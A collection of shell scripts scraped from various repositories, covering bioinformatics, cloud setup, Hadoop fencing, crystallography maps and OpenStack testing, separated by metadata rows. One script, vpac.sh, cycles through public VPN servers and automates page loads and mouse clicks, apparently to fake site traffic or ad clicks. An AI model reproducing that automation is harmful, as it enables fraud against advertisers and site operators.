cp -r $outputfolder/$sample/*/results $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/RelocaTE
# If cleanup intermediate files is specified then delete all intermediate files specific to the sample
# i.e. leave any reusable species data behind.
if [[ "$remove_intermediates" = "on" ]]
then
printf "\nRemoving RelocaTE intermediate files\n\n"
rm -r $outputfolder/$sample
fi
cd ..
fi
shopt -s nocasematch
if [[ $methods == *ngs_te_mapper* || $methods == *ngstemapper* ]]
then
shopt -u nocasematch
################################## Run ngs_te_mapper ##################################
printf "\nRunning ngs_te_mapper pipeline...\n\n" | tee -a /dev/stderr
cd ngs_te_mapper
bash runngstemapper.sh $consensus_te_seqs $reference_genome $sample $fastq1 $fastq2 $outputfolder
# Save the original result file and the bed file filtered by mcclintock
mv $outputfolder/$sample/$sample"_ngs_te_mapper_nonredundant.bed" $test_dir/$outputfolder/$genome/$sample/results/
mkdir $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/ngs_te_mapper
cp $outputfolder/$sample/analysis/bed_tsd/*.bed $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/ngs_te_mapper
# If cleanup intermediate files is specified then delete all intermediate files specific to the sample
# i.e. leave any reusable species data behind.
if [[ "$remove_intermediates" = "on" ]]
then
printf "\nRemoving ngs_te_mapper intermediate files\n\n"
rm -r $outputfolder/$sample
fi
cd ..
fi
shopt -s nocasematch
if [[ $methods == *popoolationte* ]]
then
shopt -u nocasematch
################################## Run PoPoolationTE ##################################
printf "\nRunning PoPoolationTE pipeline...\n\n" | tee -a /dev/stderr
# Create te_hierachy
if [[ ! -f $test_dir/$outputfolder/$genome/reference/te_hierarchy ]]
then
printf "insert\tid\tfamily\tsuperfamily\tsuborder\torder\tclass\tproblem\n" > $test_dir/$outputfolder/$genome/reference/te_hierarchy
awk '{printf $0"\t"$2"\t"$2"\tna\tna\tna\t0\n"}' $popool_te_families >> $test_dir/$outputfolder/$genome/reference/te_hierarchy
fi
te_hierarchy=$test_dir/$outputfolder/$genome/reference/te_hierarchy
cd PoPoolationTE
bash runpopoolationte.sh $popoolationte_reference_genome $te_hierarchy $fastq1 $fastq2 $popool_te_locations $processors $outputfolder
# Save the original result file and the bed files filtered by mcclintock
mv $outputfolder/$sample/$sample"_popoolationte"* $test_dir/$outputfolder/$genome/$sample/results/
mkdir $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/PoPoolationTE
cp $outputfolder/$sample/te-poly-filtered.txt $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/PoPoolationTE
# If cleanup intermediate files is specified then delete all intermediate files specific to the sample
# i.e. leave any reusable species data behind.
if [[ "$remove_intermediates" = "on" ]]
then
printf "\nRemoving PoPoolationTE intermediate files\n\n"
rm -r $outputfolder/$sample
fi
cd ..
fi
#########################################################################################
# If cleanup intermediate files is specified then delete all intermediate files specific to the sample
# i.e. leave any reusable species data behind.
if [[ "$remove_intermediates" = "on" ]]
then
printf "\nRemoving McClintock intermediate files\n\n"
rm -r $test_dir/$outputfolder/$genome/$sample/reads
fi
printf "\nPipeline Complete\n\n" | tee -a /dev/stderr
| true
|
a78d897e6ab598ffefd8936a8dcd6688955d7000
|
Shell
|
szepeviktor/debian-server-tools
|
/tools/flock-self.sh
|
UTF-8
| 293
| 2.84375
| 3
|
[
"MIT"
] |
permissive
|
#
# Flock on itself.
#
# VERSION :0.1.0
exec 200<"$0"
# Wait for other processes to finish
# flock 200 || exit 200
flock --nonblock 200 || exit 200
# Example
#
# exec 200<$0
# flock --nonblock 200 || exit 200
# echo "Unique start ..."
# sleep 5
# echo "End."
| true
|
54d6207ea17952cc39c3b97dc25242f88b87162d
|
Shell
|
slamdev/catalog
|
/etc/scripts/set-gcloud-project.sh
|
UTF-8
| 240
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/sh
##
## Set current project in gcloud cli
##
set -euo pipefail
TF_DIR="../cluster-configuration"
CURRENT_PROJECT_ID=`(cd ${TF_DIR} && terraform output -module=project project_id)`
gcloud config set project ${CURRENT_PROJECT_ID}
| true
|
80b375409207102e3847a676f12259a33fb63d16
|
Shell
|
m41k/robroc
|
/vpac.sh
|
UTF-8
| 717
| 2.625
| 3
|
[] |
no_license
|
#!/bin/bash
#TESTAR
function pac()
{
while [ 1 ]; do
sysctl -w vm.drop_caches=3
TARGET="ojas17.jpg"
NUMPAC=200
DCAPTU="capture"
INTERF="tun0"
tcpdump -c $NUMPAC -i $INTERF -w $DCAPTU &
luakit -n luw.servehttp.com
sleep 15
if tcpdump -x -X -r $DCAPTU | grep $TARGET; then
xdotool mousemove 550 600 click 1&
sleep 35
killall luakit
rm $DCAPTU
else
killall luakit
rm $DCAPTU
fi
sleep 5
done
}
wget www.vpngate.net/api/iphone/
cat index.html | while read LINHA; do
HOST=`echo $LINHA | cut -d "," -f1`
echo $LINHA | cut -d "," -f15 | base64 -d > teste64 2> /dev/null
openvpn --config teste64 &
sleep 20
if ifconfig | grep tun; then
pac
fi
killall openvpn
done
| true
|
99ca515537465d87cbcd2f6d3244029022ae1f4c
|
Shell
|
BaliStarDUT/hello-world
|
/code/shell/export.sh
|
UTF-8
| 500
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/bash
if[ "$1"="--export" ]
then
export LOCATION=USA
elif [ "$1"="--no-export" ]
then
LOCATION=USA
else
echo
echo -e "`basename $0` --export\texport parent process's variable to child process"
echo -e "`basename $0` --no-export\tdon't export parent process's variable to child process"
echo
exit 0
fi
echo
echo "Your parent is at '$LOCATION'."
bash child.sh
echo
echo -e "Your parent is at '$lOCATION'."
echo -e "Child prcess and parent process have different LOCATION."
echo
exit 0
| true
|
10482d49bcf0832f6d27da2afb54208f44aaf878
|
Shell
|
kmkurn/pytorch-crf
|
/pre-commit.sh
|
UTF-8
| 277
| 3.6875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Format all staged Python files (that are NOT deleted) with yapf
PYTHON_FILES=$(git diff --cached --name-only --diff-filter=d | grep -E '\.py')
if [ -n "$PYTHON_FILES" ]; then
for file in $PYTHON_FILES; do
yapf -i "$file" && git add "$file"
done
fi
| true
|
bb25877e8ea38e134e081f7c95f9e042ae729aac
|
Shell
|
emibcn/abb-technical-test-script
|
/test-script.sh
|
UTF-8
| 2,217
| 4.375
| 4
|
[] |
no_license
|
#!/bin/bash -e
# Determine which type of output we'll do
# As we only accept one option, we don't really need getopt
OUTPUT_TYPE="influx"
if [ "${1}" = '--human' ]
then
OUTPUT_TYPE="HUMAN"
fi
ERROR=""
TIMESTAMP="$(date +%s%N)"
MEASUREMENT="example"
print_value() {
local FIELD="${1}"
local VALUE="${2}"
if [ "${OUTPUT_TYPE}" = 'HUMAN' ]
then
# Pretty print variable name
local CAPITALIZED="${FIELD^}"
echo "${CAPITALIZED//_/ }: ${VALUE}"
else
echo "${MEASUREMENT} ${FIELD}=${VALUE} ${TIMESTAMP}"
fi
}
# Wrap influx text values with quotes
print_text_value() {
if [ "${OUTPUT_TYPE}" = 'HUMAN' ]
then
print_value "${1}" "${2}"
else
print_value "${1}" "\"${2}\""
fi
}
# Show error:
# - If there is no error, show "OK"
# - For influx, if there is an error message, add "ERROR" at
# the beginning, so Grafana shows it RED
print_error() {
local ERR_MSG="${@}"
if [ "${ERR_MSG}" = "" ]
then
ERR_MSG="OK"
elif [ "${OUTPUT_TYPE}" != 'HUMAN' ]
then
ERR_MSG="ERROR: ${ERR_MSG}"
fi
print_text_value "error" "${ERR_MSG}"
}
# Get default router information and extract its IP
ROUTER="$(ip route show default | sed -e 's/.* via \([^ ]*\) .*/\1/')"
# If no IP could be extracted
if [ "${ROUTER}" = "" ]
then
ERROR="No default router found"
else
print_text_value "router" "${ROUTER}"
fi
if [ "${ERROR}" = "" ]
then
# Try to ping the router. Fail fast:
# - c1: Only one ping
# - W1: One second timeout
TIME="$(ping -c1 -W1 "${ROUTER}" | grep 'bytes from' | sed -e 's/.* time=\([^ ]*\) .*/\1/')"
if [ "$TIME" = "" ]
then
ERROR="Default router ${ROUTER} could not be reached"
else
print_value "time_to_router" "${TIME}"
fi
fi
if [ "${ERROR}" = "" ]
then
# Get own public IP from public service icanhazip
PUBLIC_IP="$(curl -s https://icanhazip.com)"
# Reverse resolve public IP using dig (and remove leading dot)
RESOLVED_HOST="$(dig +short -x "${PUBLIC_IP}" | sed -e 's/\.$//')"
print_text_value "public_ip" "${PUBLIC_IP}"
print_text_value "resolved_host" "${RESOLVED_HOST}"
fi
print_error "${ERROR}"
| true
|
177e23189ec40a3fc19bc4a4939b2b44cde90d9a
|
Shell
|
frankymacster/incredible
|
/.travis-push-gh-pages.sh
|
UTF-8
| 527
| 2.75
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# inspired by https://gist.github.com/domenic/ec8b0fc8ab45f39403dd
./deploy.sh gh-page
cp -vr logic/dist/doc/html/incredible-logic/ gh-page/doc
echo 'incredible.pm' > gh-page/CNAME
# Prepare an empty directory
cd gh-page
git init
git config user.name "Incredible CI"
git config user.email "mail@joachim-breitner.de"
git add .
git commit -m "Deploy to GitHub Pages"
# The diversion to /dev/null is required to keep the GH_TOKEN secret
git push --force --quiet "https://${GH_TOKEN}@${GH_REF}" master:gh-pages > /dev/null 2>&1
| true
|
9f94c7e49bbb8a2269eb624d881019faa66d7f8f
|
Shell
|
YacilaIsabela/bunny_scripts
|
/con_maths.sh
|
UTF-8
| 708
| 3.21875
| 3
|
[] |
no_license
|
#! /bin/bash
path="./"
echo "Using this path: " $path
dirs=`ls -d ${path}s*/`
for dir in $dirs; do
id=`basename ${dir} | cut -c 1-4`
echo $dir${id}_Mov_suff_minus*
#fslmaths ${dir}con_0001 -add ${dir}con_0002 -add ${dir}con_0003 ${dir}${id}_Mov_suff
#fslmaths ${dir}con_0004 -add ${dir}con_0005 -add ${dir}con_0006 ${dir}${id}_Rest_suff
#fslmaths ${dir}con_0007 -add ${dir}con_0008 -add ${dir}con_0009 ${dir}${id}_Mov_neu
#fslmaths ${dir}con_0010 -add ${dir}con_0011 -add ${dir}con_0012 ${dir}${id}_Rest_neu
#fslmaths ${dir}${id}_Mov_suff -sub ${dir}${id}_Mov_neu ${dir}${id}_Mov_suff_minus_neu
#fslmaths ${dir}${id}_Rest_suff -sub ${dir}${id}_Rest_neu ${dir}${id}_Rest_suff_minus_neu
done
| true
|
0d123d6f6bcacb11aa6c25c149940edb3bf40851
|
Shell
|
chrishefele/kaggle-sample-code
|
/Malware/src/mk_train_small.sh
|
UTF-8
| 227
| 2.6875
| 3
|
[] |
no_license
|
SRC=/home/chefele/kaggle/Malware/download/train
DST=/home/chefele/kaggle/Malware/data/train_small
cd ${DST}
pwd
for f in ${SRC}/3*.* ${SRC}/c*.* ${SRC}/H*.*
do
ln --verbose --symbolic ${f} `basename ${f}`
done
pwd
| true
|
b332f765cc654f21c1ce413fbde5138ff710a5ba
|
Shell
|
GamesCreatorsClub/GCC-Rover
|
/pyros/linux-service/start-pyros
|
UTF-8
| 393
| 3.21875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
BINARY=/home/pi/pyros/pyros-core.py
test -x $BINARY || { echo "$BINARY not avaible";
if [ "$1" = "stop" ]; then exit 0;
else exit 5; fi; }
echo -n "Starting PyROS daemon... "
mkdir -p /home/pi/pyros/code
mkdir -p /home/pi/pyros/logs
chown pi /home/pi/pyros/code
chown pi /home/pi/pyros/logs
cd /home/pi/pyros
python3 -u 2>&1 >/home/pi/pyros/logs/pyros.log $BINARY
| true
|
d277d58c7f490053c4ae694b2419f753b525b1db
|
Shell
|
ShantNarkizian/Distributed-sharded-kvstore
|
/multi_docker_script.sh
|
UTF-8
| 330
| 2.546875
| 3
|
[] |
no_license
|
docker build -t assignment4-image .
for i in {1..8};
do docker kill node$i;
docker kill replica$i; done
docker system prune -f
docker network create --subnet=10.10.0.0/16 assignment4-net
for filename in replicascripts/replica*.sh;
do
echo $filename
open -a Terminal.app $filename
#gnome-terminal -- $filename
done
| true
|
f553fe4a5af9727b073af60a71334db4f48de0ca
|
Shell
|
louishust/hadoop_fence
|
/q_namenode.sh
|
UTF-8
| 1,552
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/bash
usage(){
echo "Usage: $0 hostname port"
echo "Note: hostname can not be ip"
exit 1
}
function valid_ip()
{
local ip=$1
local stat=1
if [[ $ip =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
OIFS=$IFS
IFS='.'
ip=($ip)
IFS=$OIFS
[[ ${ip[0]} -le 255 && ${ip[1]} -le 255 \
&& ${ip[2]} -le 255 && ${ip[3]} -le 255 ]]
stat=$?
fi
return $stat
}
# invoke usage
# call usage() function if filename not supplied
[[ $# -ne 2 ]] && usage
host=$1
port=$2
zkhosts=("ubuntu" "ubuntu" "ubuntu")
username="hadoop"
CONN_TIMEOUT=5
# check hostname
if valid_ip $1; then
usage
fi
unreached_hosts=0
for element in "${zkhosts[@]}"; do
echo "try to connect $element to execute fence!"
ssh -o ConnectTimeout=$CONN_TIMEOUT $username@$element "q_datanode.sh $host $port" &
done
# wait the jobs
for job in `jobs -p`
do
wait $job
echo "ssh datanode return $?"
if [ $? -eq 0 ]; then
let "unreached_hosts+=1"
elif [ $? -eq 2 ]; then
echo "Can not ssh to datanode, ret = 2!"
elif [ $? -eq 1 ]; then
exit 0
elif [ $? -eq 3 ]; then
exit 1
elif [ $? -eq 255 ]; then
echo "Can not ssh to datanode, ret= 255!"
fi
done
zknum=${#zkhosts[@]}
let qurom=zknum/2
echo "$unreached_hosts zks kill the active namenode successfully!"
if [ $unreached_hosts -gt $qurom ];then
echo "Fence successfully!"
exit 0
else
echo "Not enough zks kill the active namenode!"
exit 1
fi
| true
|
077c2055f0e246c588d75ce098257c51b31bf1f0
|
Shell
|
adliano/LinuxSystemAdminProjects
|
/Project2/getopthelp
|
UTF-8
| 263
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
opts=":a:b:cd"
while getopts $opts arg; do
case $arg in
a) echo $OPTARG;;
b) echo $OPTARG;;
c) echo $OPTIN ;;
d) echo "option d";;
?) echo "invalid option -$OPTARG";;
:) echo "missing argumet";;
esac
done
| true
|
4547f81583b6abff4f4bc3f71f3df4576b8cd9aa
|
Shell
|
lupanh/phenominer
|
/phenominer-nlp/src/app/nlptools_webservice.sh
|
UTF-8
| 881
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
################################################################################
# #
# Script run NLP tools webservice (BLLIP, GENIA, Ontologies annotator) #
# Copyright (C) 2014 Mai-Vu Tran <vutranmai@gmail.com> #
# #
################################################################################
# template
Date="24/05/2014"
Version="0.0.1"
Author="Mai-Vu Tran (vutranmai@gmail.com)"
### Functions ###
### Main ###
OS=`uname`
APP_HOME="."
LIB="$APP_HOME/lib";
CLASSPATH="$JAVA_DIR/lib/tools.jar"
CLASSPATH=${CLASSPATH}:$LIB/*;
CLASS='org.nii.phenominer.nlp.app.NLPToolsWebService'
JAVA_OPTS="-server -XX:+UseParallelGC -Xshare:auto -Xms1g -Xmx4g"
exec java $JAVA_OPTS -cp $CLASSPATH $CLASS "$@"
exit 0
| true
|
e95da5834c7e94896d0958717d922d5800e11467
|
Shell
|
patlegris/ConfPHP-1
|
/install.example.sh
|
UTF-8
| 562
| 3.03125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
ROOT_NAME=
ROOT_PASSWORD=
USER_NAME=
USER_PASSWORD=
DBNAME=
HOST=
SQL=$(cat<<EOF
DROP DATABASE IF EXISTS $DBNAME;
CREATE DATABASE $DBNAME DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
DELETE FROM mysql.user WHERE user='$USER_NAME' AND host='$USER_NAME';
GRANT ALL PRIVILEGES ON $DBNAME.* to '$USER_NAME'@'$HOST' IDENTIFIED BY '$USER_PASSWORD' WITH GRANT OPTION;
EOF
)
echo $SQL > tmp
mysql -u$ROOT_NAME -p$ROOT_PASSWORD < tmp
rm -f tmp
# php artisan make:migration create_student_table --create=students
# php artisan migrate:refresh --seed
| true
|
c07443ebde51899d16f46a28e68c4c3102dc61ba
|
Shell
|
donaldraymond/crystallography-scripts
|
/makemap.sh
|
UTF-8
| 6,198
| 3.984375
| 4
|
[] |
no_license
|
#!/bin/bash
#######################################################
# This is a script to create ccp4 maps for O, PyMOL or COOT
#written by Donald Raymond
last_update="June 15 2015"
#######################################################
#for debugging
#set -x
#check if sftools and fft are installed
if hash sftools 2>/dev/null && hash fft 2>/dev/null; then
echo -e "\nFound sftools and fft...continuing with script"
else
echo -e "\nThis script requires sftools and fft\n"
exit 1
fi
#clear screen
clear
###############################
#
# Functions
#
###############################
#function to run sftools
function read_mtz {
#read file in sftools
sftools <<EOF | tee sftoolsread.txt
read $mtzfile
complete
list
end
yes
EOF
}
#function to make map 1:input file 2:output file 3:low res 4:high res 5:F 6:phase
function make_map {
fft HKLIN $1 MAPOUT $2.ccp4 << eof > /dev/null
xyzlim asu
resolution $3 $4
GRID SAMPLE 6.0
labin F1=$5 PHI=$6
end
eof
# normalize the map
mapmask mapin $2.ccp4 mapout $2.ccp4 << EOF > /dev/null
SCALE SIGMA
EOF
if [[ $format = dn6 ]]; then
sftools << EOF > /dev/null
mapin $2.ccp4 map
mapout $2.dn6
quit
end
EOF
#delete temp files.
rm $2.ccp4
fi
}
#Function to query user
function askuser {
echo;echo -n "$1 "
while read -r -n 1 -s answer; do
if [[ $answer = [$2] ]]; then
[[ $answer = [$3] ]] && retval=0
[[ $answer = [$4] ]] && retval=1
break
fi
done
echo
return $retval
}
#function to check for custom F and P
function check_cus {
if grep -q "$1\s*$2" sftoolsread.txt; then
echo -e "\nFound $2\n"
else
echo -e "\nDid not find $2\n"
exit 1
fi
}
# Echo purpose of script
echo -e "\n"
echo -e "*********************************************************************"
echo -e
echo -e "This is a script to produce CCP4 maps for viewing in O, PyMOL or COOT"
echo -e
echo -e "Updated on $last_update by Donald Raymond (Steve Harrison Lab)"
echo -e
echo -e "*********************************************************************"
#check if user specified an mtz file
for arg in "$@"; do
if [[ "$arg" = *.mtz ]]; then
mtzfile="$arg"
fi
done
#get mtz file if none specified
if [[ -z "$mtzfile" ]]; then
echo -e "\nMTZs in current directory: `ls -m *.mtz 2>/dev/null` \n"
read -p "Load MTZ file: " mtzfile
while [ ! -f "$mtzfile" ]; do
echo
read -p "I need a valid MTZ file: " mtzfile
done
echo -e "\nFound $mtzfile"
fi
#default format is ccp4
format=ccp4
#check for dsn6
while getopts ":d" opt; do
case $opt in
d) echo -e "\n Making DSN6 map(s)\n"
format=dn6
;;
\?) echo "Invalid option: -$OPTARG" >&2
;;
esac
done
echo -e "\nRunning sftools"
read_mtz
#Find map coefficients
echo -e "\nFinding map coefficients\n"
if $(grep -q FDM sftoolsread.txt); then
echo -e "\tDM map coefficients found\n"
map_coef=FDM
elif $(grep -q FEM sftoolsread.txt); then
echo -e "\tFEM map coefficients found\n"
map_coef=FEM
elif $(grep -q 'parrot.F_phi.F' sftoolsread.txt); then
echo -e "\tParrot map coefficients found\n"
map_coef=PARROT
elif $(grep -q FWT sftoolsread.txt) && $(grep -q DELFWT sftoolsread.txt); then
echo -e "\t2FoFc and FoFc map coefficients found\n"
map_coef=F_DELWT
elif $(grep -q FWT sftoolsread.txt); then
echo -e "\tmap coefficients found\n"
map_coef=FWT
elif $(grep -q PH2FOFCWT sftoolsread.txt) && $(grep -q PHFOFCWT sftoolsread.txt); then
echo -e "\t2FoFc and FoFc map coefficients found\n"
map_coef=2FO
elif $(grep -q PH2FOFCWT sftoolsread.txt) && ! $(grep -q PHFOFCWT sftoolsread.txt); then
echo -e "\t2FoFc map coefficients found\n"
map_coef=2FO_only
else
#ask about custom F and P
if askuser "Unknown coefficients...use custom F and P? (Y/N): " YyNn Yy Nn; then
echo; read -p "Label of amplitude column: " amp
check_cus F "$amp"
read -p "Lable of phase column: " pha
check_cus P "$pha"
map_coef=custom
else
echo -e "\nTerminating script\n"
exit 1
fi
fi
#get the resolution
echo -e "Getting resolution limits"
res_low="`awk '/The resolution range in the data base is/ {print $9}' sftoolsread.txt`"
echo -e "\n\tLow resolution limit is $res_low"
reso_high="`awk '/The resolution range in the data base is/ {print $11}' sftoolsread.txt`"
echo -e "\n\tHigh resolution limit is $reso_high\n"
#get space group name
spaceGroupName="`awk '/Initializing CHKHKL for spacegroup/ {print $5}' sftoolsread.txt`"
echo -e "The space group is $spaceGroupName \n"
#Ask user about lower resolution map
read -p "Resolution of map? [$reso_high] " res_high
while [[ -z "$res_high" ]] ; do
res_high=$reso_high
done
#Ask user for map prefix
echo
read -p "Prefix for output map file [map]: " mapName
while [[ -z $mapName ]];do
mapName=map
done
#make map
echo -e "\nMaking and normalizing map(s)"
case $map_coef in
F_DELWT) make_map $mtzfile $mapName-2FoFc $res_low $res_high FWT PHWT
make_map $mtzfile $mapName-FoFc $res_low $res_high DELFWT PHDELWT
echo -e "\n\tCreated $mapName-2FoFc.$format and $mapName-FoFc.$format"
;;
FDM) make_map $mtzfile $mapName-DM $res_low $res_high FDM PHIDM
echo -e "\n\tCreated $mapName-DM.$format"
;;
FEM) make_map $mtzfile $mapName-FEM $res_low $res_high FEM PHIFEM
echo -e "\n\tCreated $mapName-FEM.$format"
;;
PARROT) make_map $mtzfile $mapName-parrot $res_low $res_high 'parrot.F_phi.F' 'parrot.F_phi.phi'
echo -e "\n\tCreated $mapName-parrot.$format"
;;
FWT) make_map $mtzfile $mapName $res_low $res_high FWT PHWT
echo -e "\n\tCreated $mapName.$format"
;;
2FO) make_map $mtzfile $mapName-2FoFc $res_low $res_high 2FOFCWT PH2FOFCWT
make_map $mtzfile $mapName-FoFc $res_low $res_high FOFCWT PHFOFCWT
echo -e "\n\tCreated $mapName-2FoFc.$format and $mapName-FoFc.$format"
;;
2FO_only) make_map $mtzfile $mapName-2FoFc $res_low $res_high 2FOFCWT PH2FOFCWT
echo -e "\n\tCreated $mapName-2FoFc.$format"
;;
custom) make_map $mtzfile $mapName $res_low $res_high $amp $pha
echo -e "\n\tCreated $mapName.$format"
;;
*) echo -e "\nUnknow map coefficients labels"
echo -e "Please send MTZ to raymond@crystal.harvard.edu to update script"
;;
esac
rm -rf sftoolsread.txt 2> /dev/null
#Finish script
echo -e "\nScript finished\n"
| true
|
f3f53b0204b425272566a05941f144bc4e8e0f43
|
Shell
|
justuswang/rocm_umd_build_script
|
/build_llvm.sh
|
UTF-8
| 840
| 3.203125
| 3
|
[] |
no_license
|
#!/bin/bash
ROCM_ROOT_DIR=/data/rocm
if [ ! -z "$1" ]
then
ROCM_ROOT_DIR="$1"
fi
[ -d "${ROCM_ROOT_DIR}/llvm/" ] || git clone --single-branch --recursive -b roc-hcc-2.9.x https://github.com/RadeonOpenCompute/llvm.git ${ROCM_ROOT_DIR}/llvm
[ -d "${ROCM_ROOT_DIR}/llvm/tools/clang" ] || git clone --single-branch --recursive -b roc-2.9.x https://github.com/RadeonOpenCompute/clang ${ROCM_ROOT_DIR}/llvm/tools/clang
[ -d "${ROCM_ROOT_DIR}/llvm/tools/lld" ] || git clone --single-branch --recursive -b roc-hcc-2.9.x https://github.com/RadeonOpenCompute/lld ${ROCM_ROOT_DIR}/llvm/tools/lld
echo "Build output to $ROCM_ROOT_DIR/umd_lib"
cd ${ROCM_ROOT_DIR}/llvm/
mkdir -p build && cd build
cmake -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=${ROCM_ROOT_DIR}/umd_lib/llvm -DLLVM_TARGETS_TO_BUILD="AMDGPU;X86" ..
make -j 8
make install
| true
|
a417cb18897c0c327cb22727d64eead5a9f7ed7f
|
Shell
|
Sinki25/PHP
|
/getSize.sh
|
UTF-8
| 496
| 3.25
| 3
|
[] |
no_license
|
#!bin/bash
dsize=0
format=''
format1=''
case "$2" in
Music)
format="mp3"
format1="ogg"
;;
Picture)
format="png"
format1="jpg"
;;
Script)
format="sh"
;;
Video)
format="mp4"
format1="avi"
;;
Text)
format="txt"
;;
esac
echo $(find $1 -type f -name *.$format1)
for j in $(find $1 -type f -name *.$format)
do
let dsize=dsize+$(stat -c%s $j)
done
for j in $(find $1 -type f -name *.$format1)
do
let dsize=dsize+$(stat -c%s $j)
done
echo "$dsize"
| true
|
79d5fea2f671f9fc016974913326767ad0094b96
|
Shell
|
openstack-archive/deb-openstack-meta-packages
|
/src/openstack-deploy-tempest
|
UTF-8
| 19,723
| 3.90625
| 4
|
[] |
no_license
|
#!/bin/sh
set -e
export PKGOS_VERBOSE=yes
OSINSTALL_RC=~/osinstallrc
TEMPEST_CONF=/etc/tempest/tempest.conf
# This can be debian or cirros. While it's cool
# to test using the Debian image, it's also a
# quite big image which needs flavor 2 (eg: the
# HDD needs more than 1 GB of space), and it
# takes a while to build it.
TEST_IMAGE_TYPE=cirros
if [ "${TEST_IMAGE_TYPE}" = "debian" ] ; then
IMAGE_PASS=SupArP4ss
else
IMAGE_PASS="cubswin:)"
fi
# Default value for parameters:
# Possible values: loopback, presetup
LVMTYPE=loopback
# Device on which we should setup LVM for Cinder use
OTCI_LVM_DEVICE=sda
# URL of the Debian repo to use to create the Debian
# openstack VM image (only useful if the above TEST_IMAGE_TYPE
# is set to debian).
DEBIAN_REPO_PARAM=" -u http://http.debian.net/debian -s http://http.debian.net/debian"
for i in $@ ; do
case "${1}" in
"--otci-lvmtype")
if [ -z "${2}" ] ; then echo "Parameter for option --lvmtype is missing" > /dev/stderr ; DO_EXIT="yes" ; fi
LVMTYPE="${2}"
shift
shift
;;
"--otci-lvm-device")
if [ -z "${2}" ] ; then echo "Parameter for option --lvmtype is missing" > /dev/stderr ; DO_EXIT="yes" ; fi
OTCI_LVM_DEVICE="${2}"
shift
shift
;;
"--otci-openstack-debian-images-deb-repo")
if [ -z "${2}" ] ; then echo "Parameter for option --otci-openstack-debian-images-deb-repo is missing" > /dev/stderr ; DO_EXIT="yes" ; fi
DEBIAN_REPO_PARAM=" -u ${2} -s ${2}"
shift
shift
;;
*)
;;
esac
done
if [ ${DO_EXIT} = "yes" ] ; then
echo "Parameters not validated: will exit now!" > /dev/stderr
exit 1
fi
####################
# INCLUDE OUR LIBS #
####################
if ! [ -r /usr/share/openstack-deploy/preseed-lib ] ; then
echo "Can't find /usr/share/openstack-deploy/pressed-lib: exiting"
exit 1
fi
. /usr/share/openstack-deploy/preseed-lib
if ! [ -r /usr/share/openstack-pkg-tools/pkgos_func ] ; then
echo "Can't find /usr/share/openstack-pkg-tools/pkgos_func: exiting"
exit 1
fi
. /usr/share/openstack-pkg-tools/pkgos_func
if ! [ -r /etc/default/openstack-proxy-node-network ] ; then
echo "Can't find /etc/default/openstack-proxy-node-network: exiting"
exit 1
fi
. /etc/default/openstack-proxy-node-network
if [ -r "${OSINSTALL_RC}" ] ; then
. ${OSINSTALL_RC}
else
echo "Cannot find ${OSINSTALL_RC}: exiting..."
exit 1
fi
if [ -r ~/openrc.sh ] ; then
. ~/openrc.sh
else
echo "Cannot find openrc.sh: exiting..."
exit 1
fi
#################################
# DEFINE SOME UTILITY FUNCTIONS #
#################################
osinstall_check_installed () {
local PKG_NAME
PKG_NAME=${1}
INSTALL_STRING=`dpkg -l ${PKG_NAME} | grep ^ii | awk '{print $2}'`
if [ "${INSTALL_STRING}" = ${PKG_NAME} ] ; then
return 0
else
return 1
fi
}
osinstall_install_if_not_installed () {
local PKG_NAME
PKG_NAME=${1}
if ! osinstall_check_installed ${PKG_NAME} ; then
DEBIAN_FRONTEND=noninteractive ${APTGET} install ${PKG_NAME}
fi
}
deploy_tempest_install_pkgs () {
echo "===> Installing tempest and openstack-debian-images"
osinstall_install_if_not_installed tempest
cp /usr/share/openstack-deploy/tempest_exclude.conf /etc/tempest/exclude.conf
osinstall_install_if_not_installed openstack-debian-images
osinstall_install_if_not_installed openstack-clients
}
build_and_upload_image () {
# Even if we don't use the Cirros image for tests, we need it
# because there's some Cinder tests that are expecting the image
# to be in there.
# Download the Cirros image
CIRROS_VERSION=0.3.1
mkdir -p /opt/stack/new/devstack/files/images/cirros-${CIRROS_VERSION}-x86_64-uec
wget http://download.cirros-cloud.net/${CIRROS_VERSION}/cirros-${CIRROS_VERSION}-x86_64-uec.tar.gz
tar -C /opt/stack/new/devstack/files/images/cirros-${CIRROS_VERSION}-x86_64-uec -xvzf cirros-${CIRROS_VERSION}-x86_64-uec.tar.gz
rm cirros-${CIRROS_VERSION}-x86_64-uec.tar.gz
AUTH_TOKEN=${RC_KEYSTONE_AUTHTOKEN}
if [ "${TEST_IMAGE_TYPE}" = debian ] ; then
echo "===> Creating Debian image"
build-openstack-debian-image -r jessie -p ${IMAGE_PASS} ${DEBIAN_REPO_PARAM}
IMAGE_PATH=`ls *.qcow2`
echo "===> Uploading image to Glance"
IMAGE_REF=`pkgos_get_id glance image-create --name foo --disk-format=qcow2 --container-format=bare --visibility public --file=${IMAGE_PATH}`
else
echo "===> Download the Cirros image"
IMAGE_PATH=/opt/stack/new/devstack/files/images/cirros-${CIRROS_VERSION}-x86_64-disk.img
wget http://download.cirros-cloud.net/${CIRROS_VERSION}/cirros-${CIRROS_VERSION}-x86_64-disk.img -O ${IMAGE_PATH}
IMAGE_REF=`pkgos_get_id glance image-create --name foo --disk-format=qcow2 --container-format=bare --visibility public --file=${IMAGE_PATH}`
fi
}
create_non_admin_keystone_user () {
openstack project create testme
openstack user create --password testme --project testme --email root@localhost --enable testme
openstack project create testme2
openstack user create --password testme2 --project testme2 --email root@localhost --enable testme2
}
fix_tempest_config () {
echo "===> Fixing tempest.conf"
# [identity]
pkgos_inifile set ${TEMPEST_CONF} identity uri http://${DEFROUTE_IP}:35357/v2.0
pkgos_inifile set ${TEMPEST_CONF} identity uri_v3 http://${DEFROUTE_IP}:35357/v3
